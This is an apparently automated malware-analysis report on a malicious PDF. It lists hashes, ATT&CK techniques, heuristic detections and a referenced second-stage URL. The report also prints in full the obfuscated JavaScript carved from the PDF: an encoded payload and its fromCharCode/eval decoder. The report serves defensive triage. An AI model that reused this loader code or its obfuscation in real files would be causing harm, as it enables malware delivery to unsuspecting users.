Malicious PDF — malware analysis report

Static analysis result for SHA-256 018844da8f2bedc9…

MALICIOUS

PDF

2.7 KB First seen: 2012-07-12
MD5: a60e5eabe0358ad0ebe37568c6472ce5 SHA-1: d45b794ac57c390cc3b50559d7836fc69a057f3b SHA-256: 018844da8f2bedc94b11627e4369866df11f098bdc3938d32ef176fa26c1e7eb
158 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The PDF file contains embedded JavaScript that utilizes String.fromCharCode and eval() to decode and execute a payload. The JavaScript appears to be heavily obfuscated, but it references the URL http://d2F.QK/N/a, likely for downloading a second-stage payload. The ML classifier strongly indicates maliciousness.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 5

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    eval(hzxqy);
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://d2F.QK/N/a Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj111711_000.js pdf-javascript-stream PDF /JS object 111711 at offset 0x197 2599 bytes
SHA-256: 630d4430db1037a125ea8f70714d59a39cb6c335d06e00d8737335d22b32651e
Preview script
First 1,000 lines of the extracted script
krcwg="0F1-1]1f2Z1d2d1b3]1`2h1^3?3Q1X1Y2J2]1<1U3L1M1P1Q3f3h1N3.3;1E1H1I33351F2W2Y1?1B3T1@3E3G1=3A3I1819273X1013142L2T112U2V1.383b0^1*3`0i2^0e0f3R3Y0c3a0a3[0_2g3+0Q0Z3K0T0W3_0U3S3c0R2f3V0O3M0K0L242R0I3^0G2X3-000=0B2O0@2b0>3Z3d090:2[2_073P053N032S0131370,0-2`3O0*2a2c";fohpaoa7="A602ZBDFJcKb=gLj00C8hY7MM]]1A70SDG3CTD^IDPMaGJ^eBhNEeGY0Jcg2:j@7=I<9Ca-9SQdYS_ID5,1NK<5cMI=Wc_11K,.38ZCh6:h-L=V0I=7MMZK-<FH.38ZCh6:F<GJ^eCiI2BiD-7;_IHJH]7h8N7VKE^Bcg2:E@L-1<=V0I=7MMZ_Q1K,7?L9@==9`]`^gjU@fGKMg9e_7K]_fH7+[c:K,5P-.PC8b@VX282KbA^P=Dh9.3LV,.ZX>K6OQ:JQCN2*Eg2**.3OZ+,EGeR;?*XK8Tc2<R*T.OeJK96+_2-TK,<-^2;O`1:O:g]._Z9K96*>2TW:K4Kh_3dNQ:LQ?,.]@G,CSPZJ*/2:4*.2CEGK*SAB:**2=E+<.XfIK**4:P@*2=[CV3h7C,CULZJ*/2=,J.3cGg2**.3DZ+,?_@:J*/2=[*.3h7C,CULZJ*/2;?*,.,OXK9BcV2U+8K*5]R:**2<[QK,<T*:Qi1:LL_G,DCAR;bEV2RR?K9.*:Q_`N3A1/K**,ZP/*2:@@W,+=,ZJ**:PVg>2cY_K*5J:J**:P+KB:@@W,+=8K***K*-P:J+^2=@H4.FAe:J>^B:**2=[B@.iPVK3HcV2**@.ZR+,*16K5JWD.-8C,D^[:MLj<.,PE,**+,@WKB=0,].**S,H2*K9SU2=7F@.**S,B>*K9-YK***K5@*2<XL].**S,H2*K9SU2=7F@.**S,4R*:J>W_3f1/K/B3_2+Ha.**,.VCc:NTJ.3jK_2RW1:PP?e.Gaf,44/B=[*.3h7C,?[[B:**V3K:,./OU:J>ZV2**.3U9/,85h2:,c.2**.3JB@./OU:J>^R:**2:*dN2*F].`QLK1/iN2/6a.**,.g@/K9SU2;Q85,**/K64*:J+^2<c5@K*^P:PVg>2cY_K*SPZJ**:OUB@.[JVK**4:JUJ,.]aA:P6^B=-6/,8?QZJ**:J**:J**:J**:J**:J**:J**:J**:QC@>3OC?K8Xf2=*N.34Y>K4_fc<UJ,.eQ@K4XeV3[H/,G<;B<:S/K*,W2=VU4.Z3?K8W2V3@Q4K8U`B=VN@.NT<R=3*.3ag4.OhFK8?a:KKJ+,@5cR<_Y/,8+::NVCV2>?UR=[@O,4SB>2CUJK*+=R:**2:^*?,*@KN2**.2]fXK9Z/:J/RC,**+,<-^2=`<i.Rdb:KP*T.*W-2:**2:]ffR:,_W,**+,*SO_3:^gK**,ZM-*,.+=5R<KQd,**/K6**K0A66K9Z/:J/RC,**+,CU-2<c[?2=8CG,IJ4K*5:].**,.GbLK5SH4.Vf4:M8VT.OA+:PD/B==4TK6b;:O`+4K*?R:KCIN2**@.?:*K+GER;ObG,D-T:J4*V3<bd,**/K9.*:M5QG,IJ4K*5:].**,._[]R:*R.2**.2**.2**.2**.2**.2**.2**.3cJ,.RCi:J*+B=8*2=I]>3DaI,@WD_3PdD.,M-2=ZGV2BBUB:,]U,EGSN3P8?,?GKB<WTb:KGUV3?`DZJ+?_3KF].U@UR<>XW,FfWK8S`R=4h@.Ub@K8GZR<W8].N*+,Gb?K3+52:Xh@.OjC,*1C,<5]R<<XS,/bYK8i::J+22<?Hi.N.TZKE4C,GdE:NT]U,<U22=T<5,GbG,FUK:Q,5V2@bE,GQG,4?aZQ85D.N+GK3+bZQ,?D.?]UR::*+cY7MMZK,.A602V7dHZ*I^cJcN^3ae`O^gb_e9W/K-]:UBcg2:K/^+L7h8N1.+UT***.7RM`BE]hJ*jQ[-_:0WAbP[[c:K,5P-.QB6iP282KbA^P=Dh9.22++,,*:1Lga89,.2<GJ^eBJcOPSU7hTD9Ca-9SMa;YSaga89,.2;FZBNa5gb-Cf5.1.HJ`Jc1*c1.7RJ7G:**,g:a]*``***0[[c:K,@@M.HUP-.A5^M@DKG8:F:0[/]gc`PRA=NA[3VAdX0^a@E.A5^M@DKG8:h1ROc_11K,.2:M+KS^G5Od[U7:XQ7a:F<GJ^eBKe36]GXWCFa89,.2:_Q1K,.2XB6;R9AeZi6YMgJcL1GI8C7U_g:*M[HE11K,.2IU0SYS1U:HY`KgCI1fgb_e9W/K/g:0XR*/dR9AeZi6YMgKe1.D-`iV9M5cjE11K,.2_1UhBI0A[i:F:g1^gH,1RM:HY`KgCI1fBcg2:K0==9`]`^gjU@fGKMg9e_7K]_ehD-`iV9M5cjY7MMZK-<";glasxwj8=2751;function xuaujze(xrynjna){if(xrynjna>92)xrynjna--;return xrynjna-42}jrksg=new Array();
javascript_obj111712_001.js pdf-javascript-stream PDF /JS object 111712 at offset 0x8CF 516 bytes
SHA-256: 93c9bd0c2c9633721c4876515b79c374bb9470d9a26e13ac2db5f5046a8e03b6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function GetCode(arg){var ar=String.fromCharCode(arg,131,130).split('');var an=ar.pop();var an=ar.pop();return ar.join('');}while(krcwg.length){jrksg.push((xuaujze(krcwg.charCodeAt(0))<<(4+2))+xuaujze(krcwg.charCodeAt(1))-(500+12));krcwg=krcwg.slice(2,krcwg.length)}epcpb=ksdmbu=krcwg=0;hzxqy='';function xlbsgl1(){if(krcwg==0){ksdmbu=xuaujze(fohpaoa7.charCodeAt(epcpb++));krcwg=6;}return ((ksdmbu>>--krcwg)&0x01);}while(glasxwj8--){i=0;while(jrksg[i]<0){if(xlbsgl1())i=-jrksg[i];else i++;}hzxqy+=GetCode(jrksg[i]);}